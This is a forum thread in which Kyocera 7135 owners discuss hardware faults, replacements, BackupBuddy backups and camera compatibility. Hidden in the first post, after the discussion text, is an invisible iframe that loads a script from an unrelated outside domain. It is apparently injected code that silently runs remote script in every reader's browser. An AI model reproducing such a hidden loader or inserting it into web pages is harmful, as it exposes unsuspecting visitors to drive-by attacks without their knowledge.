+ Reply to Thread

Hardware Issues and Problems

Hotsync Problem
    It was discussed here:

http://www.smartphonesource.com/vbul...&threadid=4910

When I got my replacement Friday, I received not just one 7135 but two!!

Switching the ESN on the replacement was a breeze, of course. The VZW woman gave me no flack. She didn't know how to handle the hex ESN so I gave her the other one. All went well.

Graffiti Recognition Problem

I noticed that it seemed a little hard to put in the WAP IP addresses. I had to press hard on the graffiti area to register a stroke. Saturday, I was sending out some notes and noticed that the graffiti was just not acting right. Letters were not registering correctly. A space came out as "a", a newline would come out as "f", and a lot of other things. I've been using graffiti for almost 6 years so I knew there was something wrong.

I brought up the Graffit app so I could practice some strokes and see what was going on. There was a little bump in the middle of the area (under the plastic) which caused strokes to not register correctly.

Thankfully, I had the 2nd 7135 they sent and decided to switch to it today (Sunday). Within 30 minutes, I was up and running. I used the last BackupbuddyVFS and hotsynced to make sure that worked. Graffiti worked fine when I put in the new WAP IP addresses. I didn't have to press hard and it recognizes the strokes as it should. The VZW guy asked me "how did you get that phone?" I laughed and he swiched ESNs and in less than 5 minutes all was good. Even the WAP worked without any further intervention.

These were 2 hardware problems and I don't think they are unsual for a new device on the market. I've had similar with my very first Palmpilot so although I didn't enjoy them, I wasn't surprised by them. I do believe that Kyocera will need to be ready for these exchanges once VZW makes them available. The 7135 will be more popular than the 6035 IMO.

I'm thinking that since at least 2 of us had the hotsync problem maybe a thread identifying real hardware issues might be a good idea. N'est pas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Glad you're back in business B!
    ~'kito
    pdaPhoneHome Moderator

You mentioned BackUp Buddy and I see that several others here are using it. What does it do that a Hotsync doesn't do?

Originally posted by jazmaan
    You mentioned BackUp Buddy and I see that several others here are using it. What does it do that a Hotsync doesn't do?
    BackupBuddy VFS (you can get a free version by following the handango link in the Trial Applications subdirectory on your 7135 CD) allows you to backup to the SD card.

Alan

Alan:

Originally posted by alanb
    BackupBuddy VFS (you can get a free version by following the handango link in the Trial Applications subdirectory on your 7135 CD) allows you to backup to the SD card.

Alan
    Since I still haven't gotten an SD card, this question is "research-related" ... but doesn't File Manager doesn't do the same thing?

If so, then what does Backup Buddy provide for the extra cost?

The paid version of BB VFS allows you to set a time(s) when the phone will automatically sync to the SD card anytime of the day. You won't even be aware of it.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Otter
    Alan:

Since I still haven't gotten an SD card, this question is "research-related" ... but doesn't File Manager doesn't do the same thing?

If so, then what does Backup Buddy provide for the extra cost?
    No, File manager does not do the same thing, or at least not with a single button push.

The paid version provides several features, one of which (scheduled backup) Markito mentioned above.

It also does incremental backups instead of full backups, so if you do a manual backup, it is faster.

You can restore individual files or do a full system restore.

You can encrypt the backup files, so if your SD card falls into the wrong hands, it will require a passwod to access the files.

You can set up "backup sets" if you only want to scheudle backups of specific files, but not the entire system.

I think that covers it....

So I guess Backup Buddy provides security in case your computer crashes, or for people that don't get to a Hotsync cradle frequently. Not for me.

Illegitimis nil carborundum DanDiego's Avatar

Camera for 7135

This is hardware-related so I hope I'm posting to the right place.
    I contacted Veo to verify that their SD digital camera will work with the 7135. The answer was "not yet" so I'm holding off getting one. :cashwalle

I read that someone on this board got one already but have not heard how things went.

Here's the reply I received:

Hi Dan,

We have been working with our ODM and with Kyocera to get the camera to work on the 7135 SmartPhone. As of yet, we've been unsuccessful because their SDIO slot driver is slightly different than the one that Palm uses. Our camera application was developed for the Palm slot driver.

My hope is that we will be able to get the camera to work on the 7135, but I don't expect to have the changes until the second week of February, assuming the software effort goes according to schedule. I'd suggest that you visit our website around that timeframe as we will post the software update there when it is complete.

Thanks,

Jeff

Dan,

Yes, HoTSynC has one and commented that it is not working well, but hopes to eventually get the new drivers when they become available. I too am interested in getting one... after they release the good drivers for it.
    I would like to have one, despite the fact that it sucks that the photos you take have to be converted through a PC hotsync before they become jpegs. You CAN'T just click and then email them.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Dan,

Yes, HoTSynC has one and commented that it is not working well, but hopes to eventually get the new drivers when they become available. I too am interested in getting one... after they release the good drivers for it.
    I would like to have one, despite the fact that it sucks that the photos you take have to be converted through a PC hotsync before they become jpegs. You CAN'T just click and then email them.
    It is too many steps, but....

Do a network hotsync through Express Network, then use PalmVNC to open the converter on your desktop, convert and email the photos....

Anything is possible.....

Alan

Hardware problems

As mentioned in another thread, after finding that *two* stereo headsets were not working, it appeared that the phonejack itself was defective. Got the replacement 7135 today. It *was* the jack-- works fine on this phone. HOWEVER, I now find that while the up/down rocker (around ok button) felt rock solid on the first phone, on this phone the up rocker is sort of spongy and feels like it has crepitus (sort of a crinkly feel) when pushing it. Anyone else experience this? Part of me feels at this point like just ignoring it, but for this expensive a phone, it seems ridiculous....(I must be in a bad kharma phase)....

My buttons are very tight. (No snickering you guys)
    ~'kito
    pdaPhoneHome Moderator

poked back in
    I'm pushing them

Get a replacement, pdadoc. These phones are too expensive to settle.

I agree. Spoke with them yesterday, and they're shipping me yet another one overnight. Hopefully this will be the end of this hassle. In the meantime, I'm here in my office working and enjoying Vivaldi on the phone speaker- really amazing sound for a device like this....

I just loaded up Vivaldi on my phone yesterday. Sounds great through the speaker.

Turns out Kyocera had computer problems with shipping yesterday, so I'll get the phone tomm (yes, Saturday). BUT- here's yet another "hardware" issue to be aware of. I just realized that my first replacement phone (which came from Kyocera, not getconnected), has a *hardware* Alltel" label at the bottom of the top flip, where my initial phone has a "7135" label. Needless to say, being on verizon, I'm not happy to see this! The rep at Kyocera says he thinks getconnected actually changed it from what Kyocera gave them, but frankly I find that a bit hard to believe-- he's checking into it. Anyway, a heads up if anyone requests "warranty" service from Kyocera.